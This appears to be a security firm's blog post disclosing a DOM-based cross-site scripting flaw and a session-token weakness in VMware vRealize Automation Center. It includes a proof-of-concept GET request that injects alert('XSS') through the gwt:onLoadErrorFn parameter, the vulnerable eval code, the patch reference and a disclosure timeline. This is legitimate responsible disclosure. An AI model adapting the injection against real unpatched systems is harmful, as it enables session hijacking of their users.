Misc

Security Advisory for VMware vRealize Automation Center

During a recent customer project we identified several vulnerabilities in the VMware vRealize Automation Center such as a DOM-based cross-site scripting and a missing renewal of session tokens during the login. The vulnerabilities have been disclosed to VMware on November 20th, 2017. A security advisory for the vulnerabilities has been made available here on April 12th, 2018.

Just a few words regarding the cross-site scripting vulnerability. This vulnerability is present within a GET request to the URL /vcac/gadgets/ifr because of certain URL parameters whose values are directly passed to an eval function call. The vulnerable parameters are gwt:onLoadErrorFn and gwt:onPropertyErrorFn. It seems that these parameters are actually never used by the application and we only found them by looking at the source code.

As an example, the following GET request can be used to evaluate if the vulnerability exists for the URL parameter gwt:onLoadErrorFn.

GET
/vcac/gadgets/ifr?up_gwt:onLoadErrorFn=alert('XSS')&url=https%3A%2F%2Fcom.vmware.csp.core.cafe.catalog.plugin.vproxy%2F%2Fselfservice%2FSelfServiceGadget.gadget.xml
HTTP/1.1
Host: [...]

The corresponding response shows the eval function calls for the vulnerable parameters.

HTTP/1.1 200
[...]
  function processMetas(){
    var metaProps = {};
    var propertyErrorFunc;
    var onLoadErrorFunc;
    var meta;
    var prefs = new $wnd_0.gadgets.Prefs;
    if (meta = prefs.getString('gwt:onLoadErrorFn')) {
      try {
        onLoadErrorFunc = eval(meta);
      }
       catch (e) {
        alert('Bad handler "' + content_0 + '" for "gwt:onLoadErrorFn"');
      }
    }
    if (meta = prefs.getString('gwt:onPropertyErrorFn')) {
      try {
        propertyErrorFunc = eval(meta);
      }
       catch (e) {
        alert('Bad handler "' + content_0 + '" for
"gwt:onPropertyErrorFn"');
      }
    }
[...]

Overall, to fix the vulnerabilities update your installation according to the security note VMSA-2018-0009.

Timeline of disclosure process:
20.11.2017 – Initial report of the vulnerabilities
20.11.2017 – Confirmation of the vulnerability
12.04.2018 – Release of security advisory
13.04.2018 – Blogpost